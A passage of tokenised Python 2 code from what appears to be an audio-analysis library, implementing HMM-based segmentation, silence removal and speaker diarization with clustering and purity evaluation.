[ <NUM_LIT:0> : minLength ] <EOL> flagsGT = flagsGT [ <NUM_LIT:0> : minLength ] <EOL> uFlags = numpy . unique ( flags ) <EOL> uFlagsGT = numpy . unique ( flagsGT ) <EOL> cMatrix = numpy . zeros ( ( uFlags . shape [ <NUM_LIT:0> ] , uFlagsGT . 
shape [ <NUM_LIT:0> ] ) ) <EOL> for i in range ( minLength ) : <EOL> cMatrix [ int ( numpy . nonzero ( uFlags == flags [ i ] ) [ <NUM_LIT:0> ] ) , int ( numpy . nonzero ( uFlagsGT == flagsGT [ i ] ) [ <NUM_LIT:0> ] ) ] += <NUM_LIT:1.0> <EOL> Nc , Ns = cMatrix . shape <EOL> N_s = numpy . sum ( cMatrix , axis = <NUM_LIT:0> ) <EOL> N_c = numpy . sum ( cMatrix , axis = <NUM_LIT:1> ) <EOL> N = numpy . sum ( cMatrix ) <EOL> purityCluster = numpy . zeros ( ( Nc , ) ) <EOL> puritySpeaker = numpy . zeros ( ( Ns , ) ) <EOL> for i in range ( Nc ) : <EOL> purityCluster [ i ] = numpy . max ( ( cMatrix [ i , : ] ) ) / ( N_c [ i ] ) <EOL> for j in range ( Ns ) : <EOL> puritySpeaker [ j ] = numpy . max ( ( cMatrix [ : , j ] ) ) / ( N_s [ j ] ) <EOL> purityClusterMean = numpy . sum ( purityCluster * N_c ) / N <EOL> puritySpeakerMean = numpy . sum ( puritySpeaker * N_s ) / N <EOL> return purityClusterMean , puritySpeakerMean <EOL> def trainHMM_computeStatistics ( features , labels ) : <EOL> '''<STR_LIT>''' <EOL> uLabels = numpy . unique ( labels ) <EOL> nComps = len ( uLabels ) <EOL> nFeatures = features . shape [ <NUM_LIT:0> ] <EOL> if features . shape [ <NUM_LIT:1> ] < labels . shape [ <NUM_LIT:0> ] : <EOL> print "<STR_LIT>" <EOL> labels = labels [ <NUM_LIT:0> : features . shape [ <NUM_LIT:1> ] ] <EOL> startprob = numpy . zeros ( ( nComps , ) ) <EOL> for i , u in enumerate ( uLabels ) : <EOL> startprob [ i ] = numpy . count_nonzero ( labels == u ) <EOL> startprob = startprob / startprob . sum ( ) <EOL> transmat = numpy . zeros ( ( nComps , nComps ) ) <EOL> for i in range ( labels . shape [ <NUM_LIT:0> ] - <NUM_LIT:1> ) : <EOL> transmat [ int ( labels [ i ] ) , int ( labels [ i + <NUM_LIT:1> ] ) ] += <NUM_LIT:1> <EOL> for i in range ( nComps ) : <EOL> transmat [ i , : ] /= transmat [ i , : ] . sum ( ) <EOL> means = numpy . zeros ( ( nComps , nFeatures ) ) <EOL> for i in range ( nComps ) : <EOL> means [ i , : ] = numpy . matrix ( features [ : , numpy . 
nonzero ( labels == uLabels [ i ] ) [ <NUM_LIT:0> ] ] . mean ( axis = <NUM_LIT:1> ) ) <EOL> cov = numpy . zeros ( ( nComps , nFeatures ) ) <EOL> for i in range ( nComps ) : <EOL> cov [ i , : ] = numpy . std ( features [ : , numpy . nonzero ( labels == uLabels [ i ] ) [ <NUM_LIT:0> ] ] , axis = <NUM_LIT:1> ) <EOL> return startprob , transmat , means , cov <EOL> def trainHMM_fromFile ( wavFile , gtFile , hmmModelName , mtWin , mtStep ) : <EOL> '''<STR_LIT>''' <EOL> [ segStart , segEnd , segLabels ] = readSegmentGT ( gtFile ) <EOL> flags , classNames = segs2flags ( segStart , segEnd , segLabels , mtStep ) <EOL> [ Fs , x ] = audioBasicIO . readAudioFile ( wavFile ) <EOL> [ F , _ ] = aF . mtFeatureExtraction ( x , Fs , mtWin * Fs , mtStep * Fs , round ( Fs * <NUM_LIT> ) , round ( Fs * <NUM_LIT> ) ) <EOL> startprob , transmat , means , cov = trainHMM_computeStatistics ( F , flags ) <EOL> hmm = sklearn . hmm . GaussianHMM ( startprob . shape [ <NUM_LIT:0> ] , "<STR_LIT>" , startprob , transmat ) <EOL> hmm . means_ = means <EOL> hmm . covars_ = cov <EOL> fo = open ( hmmModelName , "<STR_LIT:wb>" ) <EOL> cPickle . dump ( hmm , fo , protocol = cPickle . HIGHEST_PROTOCOL ) <EOL> cPickle . dump ( classNames , fo , protocol = cPickle . HIGHEST_PROTOCOL ) <EOL> cPickle . dump ( mtWin , fo , protocol = cPickle . HIGHEST_PROTOCOL ) <EOL> cPickle . dump ( mtStep , fo , protocol = cPickle . HIGHEST_PROTOCOL ) <EOL> fo . close ( ) <EOL> return hmm , classNames <EOL> def trainHMM_fromDir ( dirPath , hmmModelName , mtWin , mtStep ) : <EOL> '''<STR_LIT>''' <EOL> flagsAll = numpy . array ( [ ] ) <EOL> classesAll = [ ] <EOL> for i , f in enumerate ( glob . glob ( dirPath + os . sep + '<STR_LIT>' ) ) : <EOL> wavFile = f <EOL> gtFile = f . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not os . path . 
isfile ( gtFile ) : <EOL> continue <EOL> [ segStart , segEnd , segLabels ] = readSegmentGT ( gtFile ) <EOL> flags , classNames = segs2flags ( segStart , segEnd , segLabels , mtStep ) <EOL> for c in classNames : <EOL> if c not in classesAll : <EOL> classesAll . append ( c ) <EOL> [ Fs , x ] = audioBasicIO . readAudioFile ( wavFile ) <EOL> [ F , _ ] = aF . mtFeatureExtraction ( x , Fs , mtWin * Fs , mtStep * Fs , round ( Fs * <NUM_LIT> ) , round ( Fs * <NUM_LIT> ) ) <EOL> lenF = F . shape [ <NUM_LIT:1> ] <EOL> lenL = len ( flags ) <EOL> MIN = min ( lenF , lenL ) <EOL> F = F [ : , <NUM_LIT:0> : MIN ] <EOL> flags = flags [ <NUM_LIT:0> : MIN ] <EOL> flagsNew = [ ] <EOL> for j , fl in enumerate ( flags ) : <EOL> flagsNew . append ( classesAll . index ( classNames [ flags [ j ] ] ) ) <EOL> flagsAll = numpy . append ( flagsAll , numpy . array ( flagsNew ) ) <EOL> if i == <NUM_LIT:0> : <EOL> Fall = F <EOL> else : <EOL> Fall = numpy . concatenate ( ( Fall , F ) , axis = <NUM_LIT:1> ) <EOL> startprob , transmat , means , cov = trainHMM_computeStatistics ( Fall , flagsAll ) <EOL> hmm = sklearn . hmm . GaussianHMM ( startprob . shape [ <NUM_LIT:0> ] , "<STR_LIT>" , startprob , transmat ) <EOL> hmm . means_ = means <EOL> hmm . covars_ = cov <EOL> fo = open ( hmmModelName , "<STR_LIT:wb>" ) <EOL> cPickle . dump ( hmm , fo , protocol = cPickle . HIGHEST_PROTOCOL ) <EOL> cPickle . dump ( classesAll , fo , protocol = cPickle . HIGHEST_PROTOCOL ) <EOL> cPickle . dump ( mtWin , fo , protocol = cPickle . HIGHEST_PROTOCOL ) <EOL> cPickle . dump ( mtStep , fo , protocol = cPickle . HIGHEST_PROTOCOL ) <EOL> fo . close ( ) <EOL> return hmm , classesAll <EOL> def hmmSegmentation ( wavFileName , hmmModelName , PLOT = False , gtFileName = "<STR_LIT>" ) : <EOL> [ Fs , x ] = audioBasicIO . readAudioFile ( wavFileName ) <EOL> try : <EOL> fo = open ( hmmModelName , "<STR_LIT:rb>" ) <EOL> except IOError : <EOL> print "<STR_LIT>" <EOL> return <EOL> try : <EOL> hmm = cPickle . 
load ( fo ) <EOL> classesAll = cPickle . load ( fo ) <EOL> mtWin = cPickle . load ( fo ) <EOL> mtStep = cPickle . load ( fo ) <EOL> except : <EOL> fo . close ( ) <EOL> fo . close ( ) <EOL> [ Features , _ ] = aF . mtFeatureExtraction ( x , Fs , mtWin * Fs , mtStep * Fs , round ( Fs * <NUM_LIT> ) , round ( Fs * <NUM_LIT> ) ) <EOL> flagsInd = hmm . predict ( Features . T ) <EOL> if os . path . isfile ( gtFileName ) : <EOL> [ segStart , segEnd , segLabels ] = readSegmentGT ( gtFileName ) <EOL> flagsGT , classNamesGT = segs2flags ( segStart , segEnd , segLabels , mtStep ) <EOL> flagsGTNew = [ ] <EOL> for j , fl in enumerate ( flagsGT ) : <EOL> if classNamesGT [ flagsGT [ j ] ] in classesAll : <EOL> flagsGTNew . append ( classesAll . index ( classNamesGT [ flagsGT [ j ] ] ) ) <EOL> else : <EOL> flagsGTNew . append ( - <NUM_LIT:1> ) <EOL> flagsIndGT = numpy . array ( flagsGTNew ) <EOL> else : <EOL> flagsIndGT = numpy . array ( [ ] ) <EOL> acc = plotSegmentationResults ( flagsInd , flagsIndGT , classesAll , mtStep , not PLOT ) <EOL> if acc >= <NUM_LIT:0> : <EOL> print "<STR_LIT>" . format ( acc ) <EOL> return flagsInd , classesAll , acc <EOL> def mtFileClassification ( inputFile , modelName , modelType , plotResults = False , gtFile = "<STR_LIT>" ) : <EOL> '''<STR_LIT>''' <EOL> if not os . path . isfile ( modelName ) : <EOL> print "<STR_LIT>" <EOL> return ( - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ) <EOL> if modelType == '<STR_LIT>' : <EOL> [ Classifier , MEAN , STD , classNames , mtWin , mtStep , stWin , stStep , computeBEAT ] = aT . loadSVModel ( modelName ) <EOL> elif modelType == '<STR_LIT>' : <EOL> [ Classifier , MEAN , STD , classNames , mtWin , mtStep , stWin , stStep , computeBEAT ] = aT . loadKNNModel ( modelName ) <EOL> if computeBEAT : <EOL> print "<STR_LIT>" + modelName + "<STR_LIT>" <EOL> return ( - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ) <EOL> [ Fs , x ] = audioBasicIO . 
readAudioFile ( inputFile ) <EOL> if Fs == - <NUM_LIT:1> : <EOL> return ( - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ) <EOL> x = audioBasicIO . stereo2mono ( x ) <EOL> Duration = len ( x ) / Fs <EOL> [ MidTermFeatures , _ ] = aF . mtFeatureExtraction ( x , Fs , mtWin * Fs , mtStep * Fs , round ( Fs * stWin ) , round ( Fs * stStep ) ) <EOL> flags = [ ] <EOL> Ps = [ ] <EOL> flagsInd = [ ] <EOL> for i in range ( MidTermFeatures . shape [ <NUM_LIT:1> ] ) : <EOL> curFV = ( MidTermFeatures [ : , i ] - MEAN ) / STD <EOL> [ Result , P ] = aT . classifierWrapper ( Classifier , modelType , curFV ) <EOL> flagsInd . append ( Result ) <EOL> flags . append ( classNames [ int ( Result ) ] ) <EOL> Ps . append ( numpy . max ( P ) ) <EOL> flagsInd = numpy . array ( flagsInd ) <EOL> for i in range ( <NUM_LIT:1> , len ( flagsInd ) - <NUM_LIT:1> ) : <EOL> if flagsInd [ i - <NUM_LIT:1> ] == flagsInd [ i + <NUM_LIT:1> ] : <EOL> flagsInd [ i ] = flagsInd [ i + <NUM_LIT:1> ] <EOL> ( segs , classes ) = flags2segs ( flags , mtStep ) <EOL> segs [ - <NUM_LIT:1> ] = len ( x ) / float ( Fs ) <EOL> if os . path . isfile ( gtFile ) : <EOL> [ segStartGT , segEndGT , segLabelsGT ] = readSegmentGT ( gtFile ) <EOL> flagsGT , classNamesGT = segs2flags ( segStartGT , segEndGT , segLabelsGT , mtStep ) <EOL> flagsIndGT = [ ] <EOL> for j , fl in enumerate ( flagsGT ) : <EOL> if classNamesGT [ flagsGT [ j ] ] in classNames : <EOL> flagsIndGT . append ( classNames . index ( classNamesGT [ flagsGT [ j ] ] ) ) <EOL> else : <EOL> flagsIndGT . append ( - <NUM_LIT:1> ) <EOL> flagsIndGT = numpy . array ( flagsIndGT ) <EOL> else : <EOL> flagsIndGT = numpy . array ( [ ] ) <EOL> acc = plotSegmentationResults ( flagsInd , flagsIndGT , classNames , mtStep , not plotResults ) <EOL> if acc >= <NUM_LIT:0> : <EOL> print "<STR_LIT>" . format ( acc ) <EOL> return ( flagsInd , classNames , acc ) <EOL> def evaluateSegmentationClassificationDir ( dirName , modelName , methodName ) : <EOL> flagsAll = numpy . 
array ( [ ] ) <EOL> classesAll = [ ] <EOL> accuracys = [ ] <EOL> for i , f in enumerate ( glob . glob ( dirName + os . sep + '<STR_LIT>' ) ) : <EOL> wavFile = f <EOL> print wavFile <EOL> gtFile = f . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if methodName . lower ( ) in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> flagsInd , classNames , acc = mtFileClassification ( wavFile , modelName , methodName , False , gtFile ) <EOL> else : <EOL> flagsInd , classNames , acc = hmmSegmentation ( wavFile , modelName , False , gtFile ) <EOL> if acc > - <NUM_LIT:1> : <EOL> accuracys . append ( acc ) <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" . format ( <NUM_LIT> * numpy . array ( accuracys ) . mean ( ) ) <EOL> print "<STR_LIT>" . format ( <NUM_LIT> * numpy . median ( numpy . array ( accuracys ) ) ) <EOL> print "<STR_LIT>" . format ( <NUM_LIT> * numpy . array ( accuracys ) . min ( ) ) <EOL> print "<STR_LIT>" . format ( <NUM_LIT> * numpy . array ( accuracys ) . max ( ) ) <EOL> def silenceRemoval ( x , Fs , stWin , stStep , smoothWindow = <NUM_LIT:0.5> , Weight = <NUM_LIT:0.5> , plot = False ) : <EOL> '''<STR_LIT>''' <EOL> if Weight >= <NUM_LIT:1> : <EOL> Weight = <NUM_LIT> <EOL> if Weight <= <NUM_LIT:0> : <EOL> Weight = <NUM_LIT> <EOL> x = audioBasicIO . stereo2mono ( x ) <EOL> ShortTermFeatures = aF . stFeatureExtraction ( x , Fs , stWin * Fs , stStep * Fs ) <EOL> EnergySt = ShortTermFeatures [ <NUM_LIT:1> , : ] <EOL> E = numpy . sort ( EnergySt ) <EOL> L1 = int ( len ( E ) / <NUM_LIT:10> ) <EOL> T1 = numpy . mean ( E [ <NUM_LIT:0> : L1 ] ) <EOL> T2 = numpy . mean ( E [ - L1 : - <NUM_LIT:1> ] ) <EOL> Class1 = ShortTermFeatures [ : , numpy . where ( EnergySt < T1 ) [ <NUM_LIT:0> ] ] <EOL> Class2 = ShortTermFeatures [ : , numpy . where ( EnergySt > T2 ) [ <NUM_LIT:0> ] ] <EOL> featuresSS = [ Class1 . T , Class2 . T ] <EOL> [ featuresNormSS , MEANSS , STDSS ] = aT . normalizeFeatures ( featuresSS ) <EOL> SVM = aT . 
trainSVM ( featuresNormSS , <NUM_LIT:1.0> ) <EOL> ProbOnset = [ ] <EOL> for i in range ( ShortTermFeatures . shape [ <NUM_LIT:1> ] ) : <EOL> curFV = ( ShortTermFeatures [ : , i ] - MEANSS ) / STDSS <EOL> ProbOnset . append ( SVM . pred_probability ( curFV ) [ <NUM_LIT:1> ] ) <EOL> ProbOnset = numpy . array ( ProbOnset ) <EOL> ProbOnset = smoothMovingAvg ( ProbOnset , smoothWindow / stStep ) <EOL> ProbOnsetSorted = numpy . sort ( ProbOnset ) <EOL> Nt = ProbOnsetSorted . shape [ <NUM_LIT:0> ] / <NUM_LIT:10> <EOL> T = ( numpy . mean ( ( <NUM_LIT:1> - Weight ) * ProbOnsetSorted [ <NUM_LIT:0> : Nt ] ) + Weight * numpy . mean ( ProbOnsetSorted [ - Nt : : ] ) ) <EOL> MaxIdx = numpy . where ( ProbOnset > T ) [ <NUM_LIT:0> ] <EOL> i = <NUM_LIT:0> <EOL> timeClusters = [ ] <EOL> segmentLimits = [ ] <EOL> while i < len ( MaxIdx ) : <EOL> curCluster = [ MaxIdx [ i ] ] <EOL> if i == len ( MaxIdx ) - <NUM_LIT:1> : <EOL> break <EOL> while MaxIdx [ i + <NUM_LIT:1> ] - curCluster [ - <NUM_LIT:1> ] <= <NUM_LIT:2> : <EOL> curCluster . append ( MaxIdx [ i + <NUM_LIT:1> ] ) <EOL> i += <NUM_LIT:1> <EOL> if i == len ( MaxIdx ) - <NUM_LIT:1> : <EOL> break <EOL> i += <NUM_LIT:1> <EOL> timeClusters . append ( curCluster ) <EOL> segmentLimits . append ( [ curCluster [ <NUM_LIT:0> ] * stStep , curCluster [ - <NUM_LIT:1> ] * stStep ] ) <EOL> minDuration = <NUM_LIT> <EOL> segmentLimits2 = [ ] <EOL> for s in segmentLimits : <EOL> if s [ <NUM_LIT:1> ] - s [ <NUM_LIT:0> ] > minDuration : <EOL> segmentLimits2 . append ( s ) <EOL> segmentLimits = segmentLimits2 <EOL> if plot : <EOL> timeX = numpy . arange ( <NUM_LIT:0> , x . shape [ <NUM_LIT:0> ] / float ( Fs ) , <NUM_LIT:1.0> / Fs ) <EOL> plt . subplot ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> plt . plot ( timeX , x ) <EOL> for s in segmentLimits : <EOL> plt . axvline ( x = s [ <NUM_LIT:0> ] ) <EOL> plt . axvline ( x = s [ <NUM_LIT:1> ] ) <EOL> plt . subplot ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> plt . plot ( numpy . 
arange ( <NUM_LIT:0> , ProbOnset . shape [ <NUM_LIT:0> ] * stStep , stStep ) , ProbOnset ) <EOL> plt . title ( '<STR_LIT>' ) <EOL> for s in segmentLimits : <EOL> plt . axvline ( x = s [ <NUM_LIT:0> ] ) <EOL> plt . axvline ( x = s [ <NUM_LIT:1> ] ) <EOL> plt . title ( '<STR_LIT>' ) <EOL> plt . show ( ) <EOL> return segmentLimits <EOL> def speakerDiarization ( fileName , numOfSpeakers , mtSize = <NUM_LIT> , mtStep = <NUM_LIT> , stWin = <NUM_LIT> , LDAdim = <NUM_LIT> , PLOT = False ) : <EOL> '''<STR_LIT>''' <EOL> [ Fs , x ] = audioBasicIO . readAudioFile ( fileName ) <EOL> x = audioBasicIO . stereo2mono ( x ) <EOL> Duration = len ( x ) / Fs <EOL> [ Classifier1 , MEAN1 , STD1 , classNames1 , mtWin1 , mtStep1 , stWin1 , stStep1 , computeBEAT1 ] = aT . loadKNNModel ( "<STR_LIT>" ) <EOL> [ Classifier2 , MEAN2 , STD2 , classNames2 , mtWin2 , mtStep2 , stWin2 , stStep2 , computeBEAT2 ] = aT . loadKNNModel ( "<STR_LIT>" ) <EOL> [ MidTermFeatures , ShortTermFeatures ] = aF . mtFeatureExtraction ( x , Fs , mtSize * Fs , mtStep * Fs , round ( Fs * stWin ) , round ( Fs * stWin * <NUM_LIT:0.5> ) ) <EOL> MidTermFeatures2 = numpy . zeros ( ( MidTermFeatures . shape [ <NUM_LIT:0> ] + len ( classNames1 ) + len ( classNames2 ) , MidTermFeatures . shape [ <NUM_LIT:1> ] ) ) <EOL> for i in range ( MidTermFeatures . shape [ <NUM_LIT:1> ] ) : <EOL> curF1 = ( MidTermFeatures [ : , i ] - MEAN1 ) / STD1 <EOL> curF2 = ( MidTermFeatures [ : , i ] - MEAN2 ) / STD2 <EOL> [ Result , P1 ] = aT . classifierWrapper ( Classifier1 , "<STR_LIT>" , curF1 ) <EOL> [ Result , P2 ] = aT . classifierWrapper ( Classifier2 , "<STR_LIT>" , curF2 ) <EOL> MidTermFeatures2 [ <NUM_LIT:0> : MidTermFeatures . shape [ <NUM_LIT:0> ] , i ] = MidTermFeatures [ : , i ] <EOL> MidTermFeatures2 [ MidTermFeatures . shape [ <NUM_LIT:0> ] : MidTermFeatures . shape [ <NUM_LIT:0> ] + len ( classNames1 ) , i ] = P1 + <NUM_LIT> <EOL> MidTermFeatures2 [ MidTermFeatures . 
shape [ <NUM_LIT:0> ] + len ( classNames1 ) : : , i ] = P2 + <NUM_LIT> <EOL> MidTermFeatures = MidTermFeatures2 <EOL> iFeaturesSelect = [ <NUM_LIT:8> , <NUM_LIT:9> , <NUM_LIT:10> , <NUM_LIT:11> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:15> , <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:20> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:50> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> MidTermFeatures = MidTermFeatures [ iFeaturesSelect , : ] <EOL> ( MidTermFeaturesNorm , MEAN , STD ) = aT . normalizeFeatures ( [ MidTermFeatures . T ] ) <EOL> MidTermFeaturesNorm = MidTermFeaturesNorm [ <NUM_LIT:0> ] . T <EOL> numOfWindows = MidTermFeatures . shape [ <NUM_LIT:1> ] <EOL> DistancesAll = numpy . sum ( distance . squareform ( distance . pdist ( MidTermFeaturesNorm . T ) ) , axis = <NUM_LIT:0> ) <EOL> MDistancesAll = numpy . mean ( DistancesAll ) <EOL> iNonOutLiers = numpy . nonzero ( DistancesAll < <NUM_LIT> * MDistancesAll ) [ <NUM_LIT:0> ] <EOL> perOutLier = ( <NUM_LIT> * ( numOfWindows - iNonOutLiers . shape [ <NUM_LIT:0> ] ) ) / numOfWindows <EOL> MidTermFeaturesNormOr = MidTermFeaturesNorm <EOL> MidTermFeaturesNorm = MidTermFeaturesNorm [ : , iNonOutLiers ] <EOL> if LDAdim > <NUM_LIT:0> : <EOL> mtWinRatio = int ( round ( mtSize / stWin ) ) <EOL> mtStepRatio = int ( round ( stWin / stWin ) ) <EOL> mtFeaturesToReduce = [ ] <EOL> numOfFeatures = len ( ShortTermFeatures ) <EOL> numOfStatistics = <NUM_LIT:2> <EOL> for i in range ( numOfStatistics * numOfFeatures ) : <EOL> mtFeaturesToReduce . append ( [ ] ) <EOL> for i in range ( numOfFeatures ) : <EOL> curPos = <NUM_LIT:0> <EOL> N = len ( ShortTermFeatures [ i ] ) <EOL> while ( curPos < N ) : <EOL> N1 = curPos <EOL> N2 = curPos + mtWinRatio <EOL> if N2 > N : <EOL> N2 = N <EOL> curStFeatures = ShortTermFeatures [ i ] [ N1 : N2 ] <EOL> mtFeaturesToReduce [ i ] . append ( numpy . 
mean ( curStFeatures ) ) <EOL> mtFeaturesToReduce [ i + numOfFeatures ] . append ( numpy . std ( curStFeatures ) ) <EOL> curPos += mtStepRatio <EOL> mtFeaturesToReduce = numpy . array ( mtFeaturesToReduce ) <EOL> mtFeaturesToReduce2 = numpy . zeros ( ( mtFeaturesToReduce . shape [ <NUM_LIT:0> ] + len ( classNames1 ) + len ( classNames2 ) , mtFeaturesToReduce . shape [ <NUM_LIT:1> ] ) ) <EOL> for i in range ( mtFeaturesToReduce . shape [ <NUM_LIT:1> ] ) : <EOL> curF1 = ( mtFeaturesToReduce [ : , i ] - MEAN1 ) / STD1 <EOL> curF2 = ( mtFeaturesToReduce [ : , i ] - MEAN2 ) / STD2 <EOL> [ Result , P1 ] = aT . classifierWrapper ( Classifier1 , "<STR_LIT>" , curF1 ) <EOL> [ Result , P2 ] = aT . classifierWrapper ( Classifier2 , "<STR_LIT>" , curF2 ) <EOL> mtFeaturesToReduce2 [ <NUM_LIT:0> : mtFeaturesToReduce . shape [ <NUM_LIT:0> ] , i ] = mtFeaturesToReduce [ : , i ] <EOL> mtFeaturesToReduce2 [ mtFeaturesToReduce . shape [ <NUM_LIT:0> ] : mtFeaturesToReduce . shape [ <NUM_LIT:0> ] + len ( classNames1 ) , i ] = P1 + <NUM_LIT> <EOL> mtFeaturesToReduce2 [ mtFeaturesToReduce . shape [ <NUM_LIT:0> ] + len ( classNames1 ) : : , i ] = P2 + <NUM_LIT> <EOL> mtFeaturesToReduce = mtFeaturesToReduce2 <EOL> mtFeaturesToReduce = mtFeaturesToReduce [ iFeaturesSelect , : ] <EOL> ( mtFeaturesToReduce , MEAN , STD ) = aT . normalizeFeatures ( [ mtFeaturesToReduce . T ] ) <EOL> mtFeaturesToReduce = mtFeaturesToReduce [ <NUM_LIT:0> ] . T <EOL> Labels = numpy . zeros ( ( mtFeaturesToReduce . shape [ <NUM_LIT:1> ] , ) ) ; <EOL> LDAstep = <NUM_LIT:1.0> <EOL> LDAstepRatio = LDAstep / stWin <EOL> for i in range ( Labels . shape [ <NUM_LIT:0> ] ) : <EOL> Labels [ i ] = int ( i * stWin / LDAstepRatio ) ; <EOL> clf = LDA ( n_components = LDAdim ) <EOL> clf . fit ( mtFeaturesToReduce . T , Labels , tol = <NUM_LIT> ) <EOL> MidTermFeaturesNorm = ( clf . transform ( MidTermFeaturesNorm . T ) ) . 
T <EOL> if numOfSpeakers <= <NUM_LIT:0> : <EOL> sRange = range ( <NUM_LIT:2> , <NUM_LIT:10> ) <EOL> else : <EOL> sRange = [ numOfSpeakers ] <EOL> clsAll = [ ] <EOL> silAll = [ ] <EOL> centersAll = [ ] <EOL> for iSpeakers in sRange : <EOL> cls , means , steps = mlpy . kmeans ( MidTermFeaturesNorm . T , k = iSpeakers , plus = True ) <EOL> clsAll . append ( cls ) <EOL> centersAll . append ( means ) <EOL> silA = [ ] ; silB = [ ] <EOL> for c in range ( iSpeakers ) : <EOL> clusterPerCent = numpy . nonzero ( cls == c ) [ <NUM_LIT:0> ] . shape [ <NUM_LIT:0> ] / float ( len ( cls ) ) <EOL> if clusterPerCent < <NUM_LIT> : <EOL> silA . append ( <NUM_LIT:0.0> ) <EOL> silB . append ( <NUM_LIT:0.0> ) <EOL> else : <EOL> MidTermFeaturesNormTemp = MidTermFeaturesNorm [ : , cls == c ] <EOL> Yt = distance . pdist ( MidTermFeaturesNormTemp . T ) <EOL> silA . append ( numpy . mean ( Yt ) * clusterPerCent ) <EOL> silBs = [ ] <EOL> for c2 in range ( iSpeakers ) : <EOL> if c2 != c : <EOL> clusterPerCent2 = numpy . nonzero ( cls == c2 ) [ <NUM_LIT:0> ] . shape [ <NUM_LIT:0> ] / float ( len ( cls ) ) <EOL> MidTermFeaturesNormTemp2 = MidTermFeaturesNorm [ : , cls == c2 ] <EOL> Yt = distance . cdist ( MidTermFeaturesNormTemp . T , MidTermFeaturesNormTemp2 . T ) <EOL> silBs . append ( numpy . mean ( Yt ) * ( clusterPerCent + clusterPerCent2 ) / <NUM_LIT> ) <EOL> silBs = numpy . array ( silBs ) <EOL> silB . append ( min ( silBs ) ) <EOL> silA = numpy . array ( silA ) ; <EOL> silB = numpy . array ( silB ) ; <EOL> sil = [ ] <EOL> for c in range ( iSpeakers ) : <EOL> sil . append ( ( silB [ c ] - silA [ c ] ) / ( max ( silB [ c ] , silA [ c ] ) + <NUM_LIT> ) ) <EOL> silAll . append ( numpy . mean ( sil ) ) <EOL> imax = numpy . argmax ( silAll ) <EOL> nSpeakersFinal = sRange [ imax ] <EOL> cls = numpy . zeros ( ( numOfWindows , ) ) <EOL> for i in range ( numOfWindows ) : <EOL> j = numpy . argmin ( numpy . 
abs ( i - iNonOutLiers ) ) <EOL> cls [ i ] = clsAll [ imax ] [ j ] <EOL> for i in range ( <NUM_LIT:1> ) : <EOL> startprob , transmat , means , cov = trainHMM_computeStatistics ( MidTermFeaturesNormOr , cls ) <EOL> hmm = sklearn . hmm . GaussianHMM ( startprob . shape [ <NUM_LIT:0> ] , "<STR_LIT>" , startprob , transmat ) <EOL> hmm . means_ = means ; hmm . covars_ = cov <EOL> cls = hmm . predict ( MidTermFeaturesNormOr . T ) <EOL> cls = scipy . signal . medfilt ( cls , <NUM_LIT> ) <EOL> cls = scipy . signal . medfilt ( cls , <NUM_LIT:11> ) <EOL> sil = silAll [ imax ] <EOL> classNames = [ "<STR_LIT>" . format ( c ) for c in range ( nSpeakersFinal ) ] ; <EOL> gtFile = fileName . replace ( '<STR_LIT>' , '<STR_LIT>' ) ; <EOL> if os . path . isfile ( gtFile ) : <EOL> [ segStart , segEnd , segLabels ] = readSegmentGT ( gtFile ) <EOL> flagsGT , classNamesGT = segs2flags ( segStart , segEnd , segLabels , mtStep ) <EOL> if PLOT : <EOL> fig = plt . figure ( ) <EOL> if numOfSpeakers > <NUM_LIT:0> : <EOL> ax1 = fig . add_subplot ( <NUM_LIT> ) <EOL> else : <EOL> ax1 = fig . add_subplot ( <NUM_LIT> ) <EOL> ax1 . set_yticks ( numpy . array ( range ( len ( classNames ) ) ) ) <EOL> ax1 . axis ( ( <NUM_LIT:0> , Duration , - <NUM_LIT:1> , len ( classNames ) ) ) <EOL> ax1 . set_yticklabels ( classNames ) <EOL> ax1 . plot ( numpy . array ( range ( len ( cls ) ) ) * mtStep + mtStep / <NUM_LIT> , cls ) <EOL> if os . path . isfile ( gtFile ) : <EOL> if PLOT : <EOL> ax1 . plot ( numpy . array ( range ( len ( flagsGT ) ) ) * mtStep + mtStep / <NUM_LIT> , flagsGT , '<STR_LIT:r>' ) <EOL> purityClusterMean , puritySpeakerMean = evaluateSpeakerDiarization ( cls , flagsGT ) <EOL> print "<STR_LIT>" . format ( <NUM_LIT:100> * purityClusterMean , <NUM_LIT:100> * puritySpeakerMean ) <EOL> if PLOT : <EOL> plt . title ( "<STR_LIT>" . format ( <NUM_LIT:100> * purityClusterMean , <NUM_LIT:100> * puritySpeakerMean ) ) <EOL> if PLOT : <EOL> plt . 
xlabel ( "<STR_LIT>" ) <EOL> if numOfSpeakers <= <NUM_LIT:0> : <EOL> plt . subplot ( <NUM_LIT> ) <EOL> plt . plot ( sRange , silAll ) <EOL> plt . xlabel ( "<STR_LIT>" ) ; <EOL> plt . ylabel ( "<STR_LIT>" ) ; <EOL> plt . show ( ) <EOL> def speakerDiarizationEvaluateScript ( folderName , LDAs ) : <EOL> '''<STR_LIT>''' <EOL> types = ( '<STR_LIT>' , ) <EOL> wavFilesList = [ ] <EOL> for files in types : <EOL> wavFilesList . extend ( glob . glob ( os . path . join ( folderName , files ) ) ) <EOL> wavFilesList = sorted ( wavFilesList ) <EOL> N = [ ] <EOL> for wavFile in wavFilesList : <EOL> gtFile = wavFile . replace ( '<STR_LIT>' , '<STR_LIT>' ) ; <EOL> if os . path . isfile ( gtFile ) : <EOL> [ segStart , segEnd , segLabels ] = readSegmentGT ( gtFile ) <EOL> N . append ( len ( list ( set ( segLabels ) ) ) ) <EOL> else : <EOL> N . append ( - <NUM_LIT:1> ) <EOL> for l in LDAs : <EOL> print "<STR_LIT>" . format ( l ) <EOL> for i , wavFile in enumerate ( wavFilesList ) : 